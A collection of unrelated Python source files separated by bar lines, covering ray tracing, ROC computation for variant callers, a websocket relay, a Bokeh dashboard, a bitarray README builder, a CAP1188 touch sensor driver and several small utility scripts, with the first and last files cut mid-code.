#create ray bundle sources and generate bundled rays
source = XicsrtSourceFocused(source_config)
bundled_rays = source.generate_rays()
rays_list.append(bundled_rays)
count_rays_in_bundle.append(len(bundled_rays['mask']))
profiler.stop("Ray Bundle Generation")
profiler.start('Ray Bundle Collection')
# append bundled rays together to form a single ray dictionary.
# create the final ray dictionary
total_rays = np.int(np.sum(count_rays_in_bundle))
rays = dict()
rays['origin'] = np.zeros((total_rays,3), dtype=np.float64)
rays['direction'] = np.zeros((total_rays,3), dtype=np.float64)
rays['wavelength'] = np.zeros((total_rays), dtype=np.float64)
rays['weight'] = np.zeros((total_rays), dtype=np.float64)
rays['mask'] = np.ones((total_rays), dtype=np.bool)
index = 0
for ii, num_rays in enumerate(count_rays_in_bundle):
rays['origin'][index:index+num_rays] = rays_list[ii]['origin']
rays['direction'][index:index+num_rays] = rays_list[ii]['direction']
rays['wavelength'][index:index+num_rays] = rays_list[ii]['wavelength']
rays['weight'][index:index+num_rays] = rays_list[ii]['weight']
rays['mask'][index:index+num_rays] = rays_list[ii]['mask']
index += num_rays
profiler.stop('Ray Bundle Collection')
if len(rays['mask']) == 0:
raise ValueError('No rays generated. Check plasma input parameters')
self.log.debug('Bundles Generated: {:0.4e}'.format(
len(m[m])))
self.log.debug('Rays per bundle, mean: {:0.0f}'.format(
np.mean(count_rays_in_bundle)))
self.log.debug('Rays per bundle, median: {:0.0f}'.format(
np.median(count_rays_in_bundle)))
self.log.debug('Rays per bundle, max: {:0d}'.format(
np.max(count_rays_in_bundle)))
self.log.debug('Rays per bundle, min: {:0d}'.format(
np.min(count_rays_in_bundle)))
return rays
def generate_rays(self):
## Create an empty list of ray bundles
bundle_input = self.setup_bundles()
## Apply filters to filter out ray bundles
bundle_input = self.bundle_filter(bundle_input)
## Populate that list with ray bundle parameters, like emissivity
bundle_input = self.bundle_generate(bundle_input)
## Use the list to generate ray sources
rays = self.create_sources(bundle_input)
return rays
|
# coding=utf-8
#
# Copyright (c) 2010-2015 Illumina, Inc.
# All rights reserved.
#
# This file is distributed under the simplified BSD license.
# The full text can be found here (and in LICENSE.txt in the root folder of
# this distribution):
#
# https://github.com/Illumina/licenses/blob/master/Simplified-BSD-License.txt
import os
import abc
import pandas
import logging
import subprocess
import tempfile
def tableROC(tbl, label_column, feature_column, filter_column=None,
filter_name=None, roc_reversed=False):
"""Compute ROC table from TP/FP/FN classification table.
:param tbl: table with label and feature
:type tbl: pandas.DataFrame
:param label_column: column name which gives the label (TP/FP/FN)
:param feature_column: column name which gives the feature
:param filter_column: column that contains the filter fields
:param filter_name: column that contains the filter name
:param roc_reversed: reverse ROC behaviour
:returns: a pandas.DataFrame with TP/FP/FN/precision/recall columns.
"""
tf1 = tempfile.NamedTemporaryFile(delete=False)
tf1.close()
tf2 = tempfile.NamedTemporaryFile(delete=False)
tf2.close()
try:
fields = [feature_column, label_column]
if filter_column:
fields.append(filter_column)
tbl[fields].to_csv(tf2.name, sep="\t", index=False)
cmdline = "roc -t %s -v %s --verbose " % (label_column, feature_column)
if filter_column:
cmdline += " -f %s" % filter_column
if filter_name:
cmdline += " -n %s" % filter_name
if roc_reversed:
cmdline += " -R 1"
cmdline += " -o %s %s" % (tf1.name, tf2.name)
logging.info("Running %s" % cmdline)
subprocess.check_call(cmdline, shell=True)
try:
result = pandas.read_table(tf1.name)
except:
raise Exception("Cannot parse ROC output.")
return result
finally:
try:
os.unlink(tf1.name)
except:
pass
try:
os.unlink(tf2.name)
except:
pass
class ROC(object):
"""ROC calculator base class"""
__metaclass__ = abc.ABCMeta
classes = {}
features = {}
def __init__(self):
self.ftable = ""
@abc.abstractmethod
def from_table(self, tbl):
""" Create ROC from feature table
:param tbl: the table
:type tbl: pandas.DataFrame
:rtype: pandas.DataFrame
"""
pass
@classmethod
def make(cls, cname):
# noinspection PyCallingNonCallable
c = cls.classes[cname]()
c.ftname = cls.features[cname]
return c
@classmethod
def register(cls, name, ftname, cons):
""" Register a ROC calculator
:param name: the name of the calculator
:param ftname: the features / feature table name
(will be accessible in the ftname attribute)
:param cons: class constructor
"""
cls.classes[name] = cons
cls.features[name] = ftname
@classmethod
def list(cls):
return cls.classes.keys()
class StrelkaSNVRoc(ROC):
"""ROC calculator for Strelka SNVs"""
def from_table(self, tbl):
tbl.loc[tbl["NT"] != "ref", "QSS_NT"] = 0
return tableROC(tbl, "tag",
"QSS_NT", "FILTER", "QSS_ref")
ROC.register("strelka.snv.qss", "hcc.strelka.snv", StrelkaSNVRoc)
class StrelkaSNVVQSRRoc(ROC):
"""ROC calculator for Strelka SNVs (newer versions which use VQSR)"""
def from_table(self, tbl):
tbl.loc[tbl["NT"] != "ref", "VQSR"] = 0
return tableROC(tbl, "tag",
"VQSR", "FILTER", "LowQscore")
ROC.register("strelka.snv.vqsr", "hcc.strelka.snv", StrelkaSNVVQSRRoc)
class StrelkaSNVEVSRoc(ROC):
"""ROC calculator for Strelka SNVs (newer versions where VQSR is called EVS)"""
def from_table(self, tbl):
tbl.loc[tbl["NT"] != "ref", "EVS"] = 0
return tableROC(tbl, "tag",
"EVS", "FILTER", "LowEVS")
ROC.register("strelka.snv", "hcc.strelka.snv", StrelkaSNVEVSRoc)
class StrelkaIndelRoc(ROC):
"""ROC calculator for Strelka Indels"""
def from_table(self, tbl):
# fix QSI for NT != ref
tbl.loc[tbl["NT"] != "ref", "QSI_NT"] = 0
return tableROC(tbl, "tag",
"QSI_NT", "FILTER", "QSI_ref")
ROC.register("strelka.indel", "hcc.strelka.indel", StrelkaIndelRoc)
class StrelkaIndelEVSRoc(ROC):
"""ROC calculator for Strelka Indels"""
def from_table(self, tbl):
# fix QSI for NT != ref
return tableROC(tbl, "tag",
"EVS", "FILTER", "LowEVS")
ROC.register("strelka.indel.evs", "hcc.strelka.indel", StrelkaIndelEVSRoc)
class Varscan2SNVRoc(ROC):
"""ROC calculator for Varscan2 SNVs"""
def from_table(self, tbl):
return tableROC(tbl, "tag", "SSC")
ROC.register("varscan2.snv", "hcc.varscan2.snv", Varscan2SNVRoc)
class Varscan2IndelRoc(ROC):
"""ROC calculator for Varscan2 Indels"""
def from_table(self, tbl):
return tableROC(tbl, "tag", "SSC")
ROC.register("varscan2.indel", "hcc.varscan2.indel", Varscan2IndelRoc)
class MutectSNVRoc(ROC):
"""ROC calculator for MuTect SNVs"""
def from_table(self, tbl):
return tableROC(tbl, "tag", "TLOD", "FILTER","t_lod_fstar")
ROC.register("mutect.snv", "hcc.mutect.snv", MutectSNVRoc)
class MutectIndelRoc(ROC):
"""ROC calculator for MuTect Indels"""
def from_table(self, tbl):
return tableROC(tbl, "tag", "TLOD", "FILTER","t_lod_fstar")
ROC.register("mutect.indel", "hcc.mutect.indel", MutectIndelRoc)
|
from django.contrib import admin
from .models import StudentSignup
class FeedbackAdmin(admin.ModelAdmin):
list_display = ('phone_number', 'classes')
class Meta:
model = StudentSignup
admin.site.register(StudentSignup)
|
def readable(nb, rounding=0):
if rounding == 0:
return '{:,}'.format(int(nb)).replace(',', ' ')
else:
return '{:,}'.format(round(nb, rounding)).replace(',', ' ')
def human_format(num):
magnitude = 0
while abs(num) >= 1000:
magnitude += 1
num /= 1000.0
# add more suffixes if you need them
return '%.2f%s' % (num, ['', 'K', 'M', 'G', 'T', 'P'][magnitude])
|
#--------------------------------
# Name: download_soils.py
# Purpose: Download soil AWC raster
#--------------------------------
import argparse
import datetime as dt
import logging
import os
import sys
import _utils
def main(output_folder, overwrite_flag=False):
"""Download soil Available Water Capacity (AWC) raster
Parameters
----------
output_folder : str
Folder path where files will be saved.
overwrite_flag : bool, optional
If True, overwrite existing files (the default is False).
Returns
-------
None
"""
# Composite SSURGO/STATSGO
download_url = 'https://storage.googleapis.com/openet/ssurgo/AWC_WTA_0to10cm_composite.tif'
# STATSGO Only
# download_url = 'https://storage.googleapis.com/openet/statsgo/AWC_WTA_0to10cm_statsgo.tif'
output_name = download_url.split('/')[-1]
output_path = os.path.join(output_folder, output_name)
if not os.path.isdir(output_folder):
os.makedirs(output_folder)
if not os.path.isfile(output_path) or overwrite_flag:
logging.info('\nDownloading AWC')
logging.info(' {}'.format(download_url))
logging.info(' {}'.format(output_path))
_utils.url_download(download_url, output_path)
else:
logging.info('\nAWC raster already downloaded')
def arg_parse():
"""Base all default folders from script location
scripts: ./pymetric/tools/download
code: ./pymetric/code
output: ./pymetric/soils
"""
script_folder = sys.path[0]
code_folder = os.path.dirname(script_folder)
project_folder = os.path.dirname(code_folder)
output_folder = os.path.join(project_folder, 'soils')
parser = argparse.ArgumentParser(
description='Download Soil Available Water Capacity (AWC)',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'--output', default=output_folder, metavar='FOLDER',
help='Output folder')
parser.add_argument(
'-o', '--overwrite', default=None, action="store_true",
help='Force overwrite of existing files')
parser.add_argument(
'-d', '--debug', default=logging.INFO, const=logging.DEBUG,
help='Debug level logging', action="store_const", dest="loglevel")
args = parser.parse_args()
# Convert relative paths to absolute paths
if args.output and os.path.isdir(os.path.abspath(args.output)):
args.output = os.path.abspath(args.output)
return args
if __name__ == '__main__':
args = arg_parse()
logging.basicConfig(level=args.loglevel, format='%(message)s')
logging.info('\n{}'.format('#' * 80))
log_f = '{:<20s} {}'
logging.info(log_f.format(
'Run Time Stamp:', dt.datetime.now().isoformat(' ')))
logging.info(log_f.format('Script:', os.path.basename(sys.argv[0])))
main(output_folder=args.output, overwrite_flag=args.overwrite)
|
'''
Copyright (c) 2016-2017 Wind River Systems, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at:
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed
under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
OR CONDITIONS OF ANY KIND, either express or implied.
'''
"""
This module contains the Relay class which is a secure way to pipe data to a
local socket connection. This is useful for Telnet which is not secure by
default.
"""
import logging
import random
import select
import socket
import ssl
import threading
import time
import sys
# -------------------------------------------------------------------
# Note: when using a proxy server, the socket class is overlayed with
# pysocks class. Keep around a local copy so that local socket
# connections don't use the proxy
# -------------------------------------------------------------------
non_proxy_socket = None
# yocto supports websockets, not websocket, so check for that
try:
import websocket
except ImportError:
import websockets as websocket
CONNECT_MSG = "CONNECTED-129812"
CONNECT_MULTI_MSG = 'CONNECTED-581273'
DISCONNECT_MULTI_MSG = 'DISCONNECTED-581273'
RELAY_VERSION = '2.0.0'
class Relay(object):
"""
Class for establishing a secure pipe between a cloud based websocket and a
local socket. This is useful for things like Telnet which are not secure to
use remotely.
"""
def __init__(self, wsock_host, sock_host, sock_port, secure=True,
log=None, local_socket=None, reconnect=False):
"""
Initialize a relay object for piping data between a websocket and a
local socket
"""
self.wsock_host = wsock_host
self.sock_host = sock_host
self.sock_port = sock_port
self.secure = secure
self.log = log
self.proxy = None
# for python3 str transformation
self.def_enc = "ISO-8859-1"
self.log_name = "Relay:{}:{}({:0>5})".format(self.sock_host,
self.sock_port,
random.randint(0,99999))
self.reconnect = reconnect
if self.log is None:
self.logger = logging.getLogger(self.log_name)
log_handler = logging.StreamHandler()
#log_formatter = logging.Formatter(constants.LOG_FORMAT, datefmt=constants.LOG_TIME_FORMAT)
#log_handler.setFormatter(log_formatter)
self.logger.addHandler(log_handler)
self.logger.setLevel(logging.DEBUG)
self.log = self.logger.log
self.running = False
self.thread = None
self.ws_thread = None
self.lsock = []
self.wsock = None
self.lconnect = 0
self._multi_channel = False
# track sockets and idx
self.lsocket_map = {}
def _connect_local(self, idx=0):
self.log(logging.DEBUG, "_connect_local idx {}".format(idx))
ret = False
try:
# check for proxy. If not proxy, this
# is None.
s = None
if non_proxy_socket:
s = non_proxy_socket(socket.AF_INET,
socket.SOCK_STREAM)
else:
s = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, True)
s.connect((self.sock_host, self.sock_port))
s.setblocking(0)
self.lsock.append(s)
self.lsocket_map[s] = idx
self.log(logging.DEBUG, "connected to {}.".format(self.sock_port))
except socket.error as err:
self.running = False
ret = True
self.log(logging.ERROR, "{} Failed to open local socket.".format(self.log_name))
self.log(logging.ERROR, "Reason: {} ".format(str(err)))
return ret
def _prepend_index(self, idx, data):
# python3 data is in bytes format and must be decoded before
# prepending. Python2 is in str format so you can easily
# prepend the idx.
if sys.version_info[0] > 2:
d = chr(idx)
d += data.decode(self.def_enc)
d = bytes(d, self.def_enc)
else:
d = chr(idx) + data
return d
def _encode_data(self, d):
"""
Python 3 has different encoding for streams, bytes vs
bytearray. Need to encode for py3. Py2 just return the data.
"""
if sys.version_info[0] > 2:
# Only encode if the type is str, some protocols are mixed
if isinstance(d, str):
raw_data = bytes(d, self.def_enc)
else:
raw_data = d
else:
raw_data = d
return raw_data
def _strip_index(self, d):
if sys.version_info[0] > 2:
raw_data = bytes(d, self.def_enc)
idx = raw_data[0]
data = raw_data[1:]
else:
# don't change the encoding for py2, this corrupts ssl
raw_data = bytearray(d)
idx = raw_data[0]
del raw_data[0]
data = raw_data
return data, int(idx)
def _on_local_message(self):
"""
Main loop that pipes all data from one socket to the next. The
websocket connection is established first and has its own
callback, so this is where the local socket will be handled.
"""
# ws data must be in binary format. The websocket lib uses
# this op code
op_binary = 0x2
op_text = 0x1
close_ws = False
while self.running is True and not close_ws:
if self.lsock:
data = ''
read_sockets, write_sockets, _es = select.select(self.lsock, [], [], 1)
for s in read_sockets:
try:
data = s.recv(1024)
self.log(logging.DEBUG, "idx {} recv {} from local socket".format(self.lsocket_map[s], len(data)))
except:
# during a close a read might return a EBADF,
# that is ok, pass it don't dump an exception
pass
if data:
# get the idx
idx = self.lsocket_map[s]
try:
if self._multi_channel:
d = self._prepend_index(idx, data)
else:
d = data
self.wsock.send(d, opcode=op_binary)
self.log(logging.DEBUG, "send {} to WS".format(len(d)))
except websocket.WebSocketConnectionClosedException:
self.log(logging.ERROR, "Websocket closed")
close_ws = True
break
else:
self.log(logging.INFO, "{}: Received NULL from local socket".format(self.log_name))
if self.reconnect and self.running and self._multi_channel:
# multi channel: notify dra and dra
# will send a new connect msg in
# _on_message
idx = self.lsocket_map[s]
self.log(logging.INFO, "Disconnecting local socket idx {}".format(idx))
# note: disconnect must be string
self.wsock.send(chr(idx) + DISCONNECT_MULTI_MSG, opcode=op_text)
self.lsock.remove(s)
self.lsocket_map.pop(s, None)
break
else:
self.log(logging.INFO, "Disconnecting all sockets")
self.running = False
break
else:
time.sleep(0.1)
for s in self.lsock:
if s:
s.close()
self.lsocket_map[s] = None
self.lsock = []
self.lscoket_map = {}
self.log(logging.INFO, "{} - Sockets Closed".format(self.log_name))
def _on_open(self, ws):
self.log(logging.INFO, "_on_open: starting thread loop")
self.track_ws = ws
self.thread = threading.Thread(target=self._on_local_message)
self.thread.start()
def _on_message(self, ws, data):
# make sure we can parse data as a string below
if not isinstance(data, str):
data = str(data, self.def_enc)
if data:
idx = 0
if data == CONNECT_MSG:
# If the local socket has not been established yet,
# and we have received the connection string, start
# local socket.
self._connect_local()
self.lconnect = 1;
self.log(logging.DEBUG, "{} Local socket opened".format(self.log_name))
elif DISCONNECT_MULTI_MSG in data:
self.log(logging.DEBUG, "Received disconnect message")
for i in self.lsocket_map.keys():
if self.lsocket_map[i] == idx:
i.close()
self.lsock.remove(i)
self.lsocket_map.pop(i, None)
elif CONNECT_MULTI_MSG in data:
# this will be called for every new connection
# on reconnect, send the idx + DISCONN message on ws
# get the idx. data comes in as binary ascii, need to
# ord/chr it before recv/send
idx = ord(data[0])
self.log(logging.DEBUG, "{} Local socket opened idx {}".format(self.log_name, idx))
self._connect_local(idx=idx)
self._multi_channel = True
else:
# send to local socket
if self._multi_channel:
s_data, idx = self._strip_index(data)
self.log(logging.DEBUG, "_on_message {}: send {} -> local socket".format(idx,len(data)))
data = s_data
enc_data = self._encode_data(data)
s = None
for i in self.lsocket_map.keys():
if self.lsocket_map[i] == idx:
s = i
break
if s:
s.send(enc_data)
def _on_error(self, ws, exception):
self.log(logging.ERROR, "_on_error: {}".format(str(exception)))
self._on_close(ws)
if self.wsock:
self.wsock.close()
self.stop()
def _on_close(self, ws):
self.log(logging.INFO,"_on_close: websocket closed")
for s in self.lsocket_map.keys():
if s:
self.log.debug("Closing sock {}".format(self.lsocket_map[s]))
s.close()
self.lsocket_map = {}
self.running = False
def start(self):
"""
Establish the websocket connection and start the main loop
"""
if not self.running:
self.running = True
sslopt = {}
if not self.secure:
sslopt["cert_reqs"] = ssl.CERT_NONE
self.wsock = websocket.WebSocketApp(
self.wsock_host,
on_message=self._on_message,
on_error=self._on_error,
on_close=self._on_close,
on_open=self._on_open)
kwargs = {'sslopt': sslopt}
if self.proxy:
self.log(logging.DEBUG, "start:self.proxy={} ".format(self.proxy)),
kwargs['http_proxy_host'] = self.proxy.host
kwargs['http_proxy_port'] = self.proxy.port
self.ws_thread = threading.Thread(target=self.wsock.run_forever, kwargs=kwargs)
self.ws_thread.start()
else:
raise RuntimeError("{} - Already running!".format(self.log_name))
def stop(self):
"""
Stop piping data between the two connections and stop the loop thread
"""
self.log(logging.INFO, "{} Stopping".format(self.log_name))
self.running = False
self.reconnect = False
if self.track_ws:
self.track_ws.close()
if self.thread:
self.thread.join()
self.thread = None
if self.ws_thread:
# websocket client joins the thread
self.ws_thread = None
relays = []
def create_relay(url, host, port, secure=True, log_func=None, local_socket=None,
reconnect=False, proxy=None):
global relays, non_proxy_socket
non_proxy_socket = local_socket
newrelay = Relay(url, host, port, secure=secure, log=log_func, reconnect=reconnect)
if proxy:
newrelay.proxy = proxy
newrelay.start()
relays.append(newrelay)
def stop_relays():
global relays
threads = []
while relays:
relay = relays.pop()
thread = threading.Thread(target=relay.stop)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
def relay_version():
return RELAY_VERSION
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
# Prototype of a real-time dashboard
## References
[Bokeh server] https://bokeh.pydata.org/en/latest/docs/user_guide/server.html#userguide-server
"""
# myapp.py
from random import random
from bokeh.layouts import column
from bokeh.models import Button
from bokeh.plotting import figure, curdoc
from bokeh.models import ColumnDataSource
from bokeh.models.widgets import DataTable, DateFormatter, TableColumn
import numpy as np
def generatePrice():
symbols = ['AAA','BBB','CCC']
prices = np.random.rand(len(symbols)).round(2)
return dict(symbol=symbols,price=prices)
# make table
data = generatePrice()
print('Data: ',data)
currentData = ColumnDataSource(data)
columns = [TableColumn(field="symbol",title="symbol"), TableColumn(field="price",title="price")]
tblPrices = DataTable(source=currentData,columns=columns,width=400, height=280)
def callback():
# test button callback
#currentData.stream(generatePrice())
symbols = ['AAA','BBB','CCC']
prices = np.random.rand(len(symbols)).round(2)
data = [(idx,val) for idx,val in enumerate(prices)]
print('patch: ',data)
patch = {'price':data}
print(patch)
currentData.patch(patch)
# add a button widget and configure with the call back
button = Button(label="Press Me", button_type='primary')
button.on_click(callback)
# put the button and plot in a layout and add to the document
curdoc().add_root(column(button, tblPrices))
|
import os
import re
import doctest
from cStringIO import StringIO
import bitarray
fo = StringIO()
def write_changelog():
fo.write("Change log\n"
"----------\n\n")
ver_pat = re.compile(r'(\d{4}-\d{2}-\d{2})\s+(\d+\.\d+\.\d+)')
count = 0
for line in open('CHANGE_LOG'):
m = ver_pat.match(line)
if m:
if count == 3:
break
count += 1
fo.write(m.expand(r'**\2** (\1):\n'))
elif line.startswith('---'):
fo.write('\n')
else:
fo.write(line)
url = "https://github.com/ilanschnell/bitarray/blob/master/CHANGE_LOG"
fo.write("Please find the complete change log\n"
"`here <%s>`_.\n" % url)
sig_pat = re.compile(r'(\w+\([^()]*\))( -> (.+))?')
def write_doc(name):
doc = eval('bitarray.%s.__doc__' % name)
lines = doc.splitlines()
m = sig_pat.match(lines[0])
if m is None:
raise Exception("signature line invalid: %r" % lines[0])
s = '``%s``' % m.group(1)
if m.group(3):
s += ' -> %s' % m.group(3)
fo.write(s + '\n')
assert lines[1] == ''
for line in lines[2:]:
fo.write(' %s\n' % line)
fo.write('\n\n')
def write_reference():
fo.write("Reference\n"
"---------\n\n"
"**The bitarray class:**\n\n")
write_doc('bitarray')
fo.write("**A bitarray object supports the following methods:**\n\n")
for method in sorted(dir(bitarray.bitarray)):
if method.startswith('_'):
continue
write_doc('bitarray.%s' % method)
fo.write("**Functions defined in the module:**\n\n")
write_doc('test')
write_doc('bitdiff')
write_doc('bits2bytes')
def write_all(data):
ver_pat = re.compile(r'(bitarray.+?)(\d+\.\d+\.\d+)')
for line in data.splitlines():
if line == 'Reference':
break
line = ver_pat.sub(lambda m: m.group(1) + bitarray.__version__, line)
fo.write(line + '\n')
write_reference()
write_changelog()
def main():
data = open('README.rst').read()
write_all(data)
new_data = fo.getvalue()
fo.close()
if new_data == data:
print "already up-to-date"
else:
with open('README.rst', 'w') as f:
f.write(new_data)
doctest.testfile('README.rst')
os.system('rst2html.py README.rst >README.html')
if __name__ == '__main__':
main()
|
# The MIT License (MIT)
#
# Copyright (c) 2018 Carter Nelson for Adafruit Industries
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
`adafruit_cap1188.cap1188`
====================================================
CircuitPython driver for the CAP1188 8-Key Capacitive Touch Sensor Breakout.
* Author(s): Carter Nelson
Implementation Notes
--------------------
**Hardware:**
* `CAP1188 - 8-Key Capacitive Touch Sensor Breakout <https://www.adafruit.com/product/1602>`_
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the supported boards:
https://github.com/adafruit/circuitpython/releases
* Adafruit's Bus Device library: https://github.com/adafruit/Adafruit_CircuitPython_BusDevice
"""
from micropython import const
__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_CAP1188.git"
# pylint: disable=bad-whitespace
_CAP1188_MID = const(0x5D)
_CAP1188_PID = const(0x50)
_CAP1188_MAIN_CONTROL = const(0x00)
_CAP1188_GENERAL_STATUS = const(0x02)
_CAP1188_INPUT_STATUS = const(0x03)
_CAP1188_LED_STATUS = const(0x04)
_CAP1188_NOISE_FLAGS = const(0x0A)
_CAP1188_DELTA_COUNT = (
const(0x10),
const(0x11),
const(0x12),
const(0x13),
const(0x14),
const(0x15),
const(0x16),
const(0x17),
)
_CAP1188_SENSITIVTY = const(0x1F)
_CAP1188_AVERAGING = const(0x24)
_CAP1188_CAL_ACTIVATE = const(0x26)
_CAP1188_MULTI_TOUCH_CFG = const(0x2A)
_CAP1188_THESHOLD_1 = const(0x30)
_CAP1188_STANDBY_CFG = const(0x41)
_CAP1188_LED_LINKING = const(0x72)
_CAP1188_PRODUCT_ID = const(0xFD)
_CAP1188_MANU_ID = const(0xFE)
_CAP1188_REVISION = const(0xFF)
# pylint: enable=bad-whitespace
_SENSITIVITY = (128, 64, 32, 16, 8, 4, 2, 1)
_AVG = (1, 2, 4, 8, 16, 32, 64, 128)
_SAMP_TIME = ("320us", "640us", "1.28ms", "2.56ms")
_CYCLE_TIME = ("35ms", "70ms", "105ms", "140ms")
class CAP1188_Channel:
# pylint: disable=protected-access
"""Helper class to represent a touch channel on the CAP1188. Not meant to
be used directly."""
def __init__(self, cap1188, pin):
self._cap1188 = cap1188
self._pin = pin
@property
def value(self):
"""Whether the pin is being touched or not."""
return self._cap1188.touched() & (1 << self._pin - 1) != 0
@property
def raw_value(self):
"""The raw touch measurement."""
return self._cap1188.delta_count(self._pin)
@property
def threshold(self):
"""The touch threshold value."""
return self._cap1188._read_register(_CAP1188_THESHOLD_1 + self._pin - 1)
@threshold.setter
def threshold(self, value):
value = int(value)
if not 0 <= value <= 127:
raise ValueError("Threshold value must be in range 0 to 127.")
self._cap1188._write_register(_CAP1188_THESHOLD_1 + self._pin - 1, value)
def recalibrate(self):
"""Perform a self recalibration."""
self._cap1188.recalibrate_pins(1 << self._pin - 1)
class CAP1188:
"""CAP1188 driver base, must be extended for I2C/SPI interfacing."""
def __init__(self):
mid = self._read_register(_CAP1188_MANU_ID)
if mid != _CAP1188_MID:
raise RuntimeError(
"Failed to find CAP1188! Manufacturer ID: 0x{:02x}".format(mid)
)
pid = self._read_register(_CAP1188_PRODUCT_ID)
if pid != _CAP1188_PID:
raise RuntimeError(
"Failed to find CAP1188! Product ID: 0x{:02x}".format(pid)
)
self._channels = [None] * 8
self._write_register(_CAP1188_LED_LINKING, 0xFF) # turn on LED linking
self._write_register(_CAP1188_MULTI_TOUCH_CFG, 0x00) # allow multi touch
self._write_register(0x2F, 0x10) # turn off input-1-sets-all-inputs feature
self.recalibrate()
def __getitem__(self, key):
pin = key
index = key - 1
if pin < 1 or pin > 8:
raise IndexError("Pin must be a value 1-8.")
if self._channels[index] is None:
self._channels[index] = CAP1188_Channel(self, pin)
return self._channels[index]
@property
def touched_pins(self):
"""A tuple of touched state for all pins."""
touched = self.touched()
return tuple([bool(touched >> i & 0x01) for i in range(8)])
def touched(self):
"""Return 8 bit value representing touch state of all pins."""
# clear the INT bit and any previously touched pins
current = self._read_register(_CAP1188_MAIN_CONTROL)
self._write_register(_CAP1188_MAIN_CONTROL, current & ~0x01)
# return only currently touched pins
return self._read_register(_CAP1188_INPUT_STATUS)
@property
def sensitivity(self):
"""The sensitvity of touch detections. Range is 1 (least) to 128 (most)."""
return _SENSITIVITY[self._read_register(_CAP1188_SENSITIVTY) >> 4 & 0x07]
@sensitivity.setter
def sensitivity(self, value):
if value not in _SENSITIVITY:
raise ValueError("Sensitivty must be one of: {}".format(_SENSITIVITY))
value = _SENSITIVITY.index(value) << 4
new_setting = self._read_register(_CAP1188_SENSITIVTY) & 0x8F | value
self._write_register(_CAP1188_SENSITIVTY, new_setting)
@property
def averaging(self):
"""Triple containing the number of samples taken for each channel,
the sample time, and the cycle time."""
register = self._read_register(_CAP1188_AVERAGING)
avg = _AVG[register >> 4 & 0x07]
samp_time = _SAMP_TIME[register >> 2 & 0x03]
cycle_time = _CYCLE_TIME[register & 0x03]
return (avg, samp_time, cycle_time)
@averaging.setter
def averaging(self, value):
if value[0] not in _AVG:
raise ValueError("Avg must be one of: {}".format(_AVG))
if value[1] not in _SAMP_TIME:
raise ValueError("Sample Time must be one of: {}".format(_SAMP_TIME))
if value[2] not in _CYCLE_TIME:
raise ValueError("Cycle Time must be one of: {}".format(_CYCLE_TIME))
avg = _AVG.index(value[0]) << 4
samp_time = _SAMP_TIME.index(value[1]) << 2
cycle_time = _CYCLE_TIME.index(value[2])
self._write_register(_CAP1188_AVERAGING, avg | samp_time | cycle_time)
@property
def thresholds(self):
"""Touch threshold value for all channels."""
return self.threshold_values()
@thresholds.setter
def thresholds(self, value):
value = int(value)
if not 0 <= value <= 127:
raise ValueError("Threshold value must be in range 0 to 127.")
self._write_block(_CAP1188_THESHOLD_1, bytearray((value,) * 8))
def threshold_values(self):
"""Return tuple of touch threshold values for all channels."""
return tuple(self._read_block(_CAP1188_THESHOLD_1, 8))
def recalibrate(self):
"""Perform a self recalibration on all the pins."""
self.recalibrate_pins(0xFF)
def delta_count(self, pin):
"""Return the 8 bit delta count value for the channel."""
if pin < 1 or pin > 8:
raise IndexError("Pin must be a value 1-8.")
# 8 bit 2's complement
raw_value = self._read_register(_CAP1188_DELTA_COUNT[pin - 1])
raw_value = raw_value - 256 if raw_value & 128 else raw_value
return raw_value
def recalibrate_pins(self, mask):
"""Recalibrate pins specified by bit mask."""
self._write_register(_CAP1188_CAL_ACTIVATE, mask)
def _read_register(self, address):
"""Return 8 bit value of register at address."""
raise NotImplementedError
def _write_register(self, address, value):
"""Write 8 bit value to registter at address."""
raise NotImplementedError
def _read_block(self, start, length):
"""Return byte array of values from start address to length."""
raise NotImplementedError
def _write_block(self, start, data):
"""Write out data beginning at start address."""
raise NotImplementedError
|
#!/usr/bin/env python
# $Id$
"""
many solutions
"""
import puzzler
from puzzler.puzzles.polysticks1234 \
import Polysticks1234TruncatedDiamondLattice6x4 as puzzle
puzzler.run(puzzle)
|
import resnext
img_path = "submissions/2.jpg"
prediction = resnext.resnext_classify(img_path)
print(type(prediction[0]))
|
import datetime
from time import process_time
import sys
from src.odinmigrator import odinlogger, jobconfig, transformation, reference, filetransfer
my_logger = odinlogger.setup_logging("main")
def create_reference(jobdata: {}) -> str:
my_logger.info("Starting reference creation")
reference.create_reference(jobdata=jobdata)
my_logger.info("Ending reference creation")
def read_job_config() -> {}:
my_logger.debug("Read the job config file for setup job")
return jobconfig.read_job_config(sys.argv[1])
def get_ts():
"""
get the current timestamp
:return: current timestamp
"""
return datetime.datetime.today()
def print_job_statistic(start_time_of_job_input, end_time_of_job_input, stats: str, end_status: str):
my_logger.info("========================================================")
my_logger.info("Job statistics : ")
my_logger.info("Job started at : %s", start_time_of_job_input)
my_logger.info("Job ended at : %s", end_time_of_job_input)
duration = end_time_of_job_input - start_time_of_job_input
